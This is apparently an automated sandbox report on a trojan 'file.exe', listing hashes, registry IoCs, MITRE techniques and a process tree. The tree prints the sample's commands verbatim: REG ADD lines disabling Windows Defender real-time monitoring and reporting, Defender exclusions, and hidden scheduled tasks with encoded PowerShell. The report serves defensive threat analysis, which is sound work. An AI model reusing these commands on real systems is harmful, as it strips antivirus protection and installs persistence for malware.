a8659ac7b2eba6523fc2cd80de01d196985e30e36879f5334c887f7d3dcf1562

Analysis

max time kernel
145s
max time network
136s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
06/12/2022, 14:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

b698ed2553037976bccdfa0468d8d5f8
SHA1

1fb66d934989ffc4e76dd65a456c7d7edc59d3ea
SHA256

a8659ac7b2eba6523fc2cd80de01d196985e30e36879f5334c887f7d3dcf1562
SHA512

efd64b6a646bf1ac0b18e37197ca15a50a8366e6623b5745157ecc692aea56760739dad23029b04325f40e93a7bd68d9d266c92aefefbcca12396420b973cbb4
SSDEEP

196608:91OaGp6oEpBR2jsSE1/i7pLc8aI7XrOtI+e4MZ07Jgf4V:3OaG/EpsC1/iSI7Xrl4MZ07ZV

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eezsWfLNyAAU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fEHCmfDBHLCPWEKC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hfJDFwXlTkShICPsXcR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ndsfoVoncIwTC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RpVGcKpDfweuJrVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fEHCmfDBHLCPWEKC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RpVGcKpDfweuJrVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NjoFBXFqU = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NjoFBXFqU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lMwNpEhoLIUn = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fEHCmfDBHLCPWEKC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lMwNpEhoLIUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fEHCmfDBHLCPWEKC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eezsWfLNyAAU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ndsfoVoncIwTC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hfJDFwXlTkShICPsXcR = "0"	conhost.exe

Executes dropped EXE 3 IoCs

pid	Process
1776	Install.exe
976	Install.exe
1504	yaPnaYN.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
880	file.exe
1776	Install.exe
1776	Install.exe
1776	Install.exe
1776	Install.exe
976	Install.exe
976	Install.exe
976	Install.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	yaPnaYN.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	yaPnaYN.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	yaPnaYN.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bFxndFhZaigozOiPDH.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2012	schtasks.exe
472	schtasks.exe
1580	schtasks.exe
1180	schtasks.exe
1180	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1816	powershell.EXE
1816	powershell.EXE
1816	powershell.EXE
1608	powershell.EXE
1608	powershell.EXE
1608	powershell.EXE
1724	powershell.EXE
1724	powershell.EXE
1724	powershell.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1816	powershell.EXE
Token: SeDebugPrivilege	1608	powershell.EXE
Token: SeDebugPrivilege	1724	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 880 wrote to memory of 1776	880	file.exe	28
PID 880 wrote to memory of 1776	880	file.exe	28
PID 880 wrote to memory of 1776	880	file.exe	28
PID 880 wrote to memory of 1776	880	file.exe	28
PID 880 wrote to memory of 1776	880	file.exe	28
PID 880 wrote to memory of 1776	880	file.exe	28
PID 880 wrote to memory of 1776	880	file.exe	28
PID 1776 wrote to memory of 976	1776	Install.exe	29
PID 1776 wrote to memory of 976	1776	Install.exe	29
PID 1776 wrote to memory of 976	1776	Install.exe	29
PID 1776 wrote to memory of 976	1776	Install.exe	29
PID 1776 wrote to memory of 976	1776	Install.exe	29
PID 1776 wrote to memory of 976	1776	Install.exe	29
PID 1776 wrote to memory of 976	1776	Install.exe	29
PID 976 wrote to memory of 2032	976	Install.exe	31
PID 976 wrote to memory of 2032	976	Install.exe	31
PID 976 wrote to memory of 2032	976	Install.exe	31
PID 976 wrote to memory of 2032	976	Install.exe	31
PID 976 wrote to memory of 2032	976	Install.exe	31
PID 976 wrote to memory of 2032	976	Install.exe	31
PID 976 wrote to memory of 2032	976	Install.exe	31
PID 976 wrote to memory of 832	976	Install.exe	33
PID 976 wrote to memory of 832	976	Install.exe	33
PID 976 wrote to memory of 832	976	Install.exe	33
PID 976 wrote to memory of 832	976	Install.exe	33
PID 976 wrote to memory of 832	976	Install.exe	33
PID 976 wrote to memory of 832	976	Install.exe	33
PID 976 wrote to memory of 832	976	Install.exe	33
PID 2032 wrote to memory of 1636	2032	forfiles.exe	35
PID 2032 wrote to memory of 1636	2032	forfiles.exe	35
PID 2032 wrote to memory of 1636	2032	forfiles.exe	35
PID 2032 wrote to memory of 1636	2032	forfiles.exe	35
PID 2032 wrote to memory of 1636	2032	forfiles.exe	35
PID 2032 wrote to memory of 1636	2032	forfiles.exe	35
PID 2032 wrote to memory of 1636	2032	forfiles.exe	35
PID 832 wrote to memory of 1504	832	forfiles.exe	36
PID 832 wrote to memory of 1504	832	forfiles.exe	36
PID 832 wrote to memory of 1504	832	forfiles.exe	36
PID 832 wrote to memory of 1504	832	forfiles.exe	36
PID 832 wrote to memory of 1504	832	forfiles.exe	36
PID 832 wrote to memory of 1504	832	forfiles.exe	36
PID 832 wrote to memory of 1504	832	forfiles.exe	36
PID 1636 wrote to memory of 680	1636	cmd.exe	38
PID 1636 wrote to memory of 680	1636	cmd.exe	38
PID 1636 wrote to memory of 680	1636	cmd.exe	38
PID 1636 wrote to memory of 680	1636	cmd.exe	38
PID 1636 wrote to memory of 680	1636	cmd.exe	38
PID 1636 wrote to memory of 680	1636	cmd.exe	38
PID 1636 wrote to memory of 680	1636	cmd.exe	38
PID 1504 wrote to memory of 1944	1504	cmd.exe	37
PID 1504 wrote to memory of 1944	1504	cmd.exe	37
PID 1504 wrote to memory of 1944	1504	cmd.exe	37
PID 1504 wrote to memory of 1944	1504	cmd.exe	37
PID 1504 wrote to memory of 1944	1504	cmd.exe	37
PID 1504 wrote to memory of 1944	1504	cmd.exe	37
PID 1504 wrote to memory of 1944	1504	cmd.exe	37
PID 1636 wrote to memory of 1328	1636	cmd.exe	40
PID 1636 wrote to memory of 1328	1636	cmd.exe	40
PID 1636 wrote to memory of 1328	1636	cmd.exe	40
PID 1636 wrote to memory of 1328	1636	cmd.exe	40
PID 1636 wrote to memory of 1328	1636	cmd.exe	40
PID 1636 wrote to memory of 1328	1636	cmd.exe	40
PID 1636 wrote to memory of 1328	1636	cmd.exe	40
PID 1504 wrote to memory of 780	1504	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:880
- C:\Users\Admin\AppData\Local\Temp\7zS2FD8.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1776
- - C:\Users\Admin\AppData\Local\Temp\7zS367C.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2032
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1636
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:680
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1328
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:832
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1504
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1944
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:780
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gNqrhYSpT" /SC once /ST 10:47:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:2012
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gNqrhYSpT"
      4⤵
      PID:1916
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gNqrhYSpT"
      4⤵
      PID:1568
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bFxndFhZaigozOiPDH" /SC once /ST 15:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc\OmXsHziWlidBLVH\yaPnaYN.exe\" 6j /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:472

C:\Windows\system32\taskeng.exe
taskeng.exe {69C35635-69EC-4046-A0A7-1FC7C0E3B97C} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
1⤵
PID:1880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1908

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1536

C:\Windows\system32\taskeng.exe
taskeng.exe {41336B9A-B471-4F70-BD12-32680918A3C0} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:780
- C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc\OmXsHziWlidBLVH\yaPnaYN.exe
  C:\Users\Admin\AppData\Local\Temp\wWpXgSHDeJdXbwIrc\OmXsHziWlidBLVH\yaPnaYN.exe 6j /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1504
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gGFrFWiKM" /SC once /ST 03:01:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1580
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gGFrFWiKM"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gGFrFWiKM"
    3⤵
    PID:576
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1028
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1032
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1328
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gXanQvvvv" /SC once /ST 09:47:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1180
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gXanQvvvv"
    3⤵
    PID:280
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gXanQvvvv"
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1540
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:856
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1548
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:696
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:872
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:852
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fEHCmfDBHLCPWEKC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\fEHCmfDBHLCPWEKC\hxpGyLXe\zqPasXghbsJVXrrI.wsf"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\fEHCmfDBHLCPWEKC\hxpGyLXe\zqPasXghbsJVXrrI.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1028
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NjoFBXFqU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1188
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NjoFBXFqU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1708
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eezsWfLNyAAU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1164
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eezsWfLNyAAU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1120
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hfJDFwXlTkShICPsXcR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hfJDFwXlTkShICPsXcR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1036
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lMwNpEhoLIUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1700
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lMwNpEhoLIUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:812
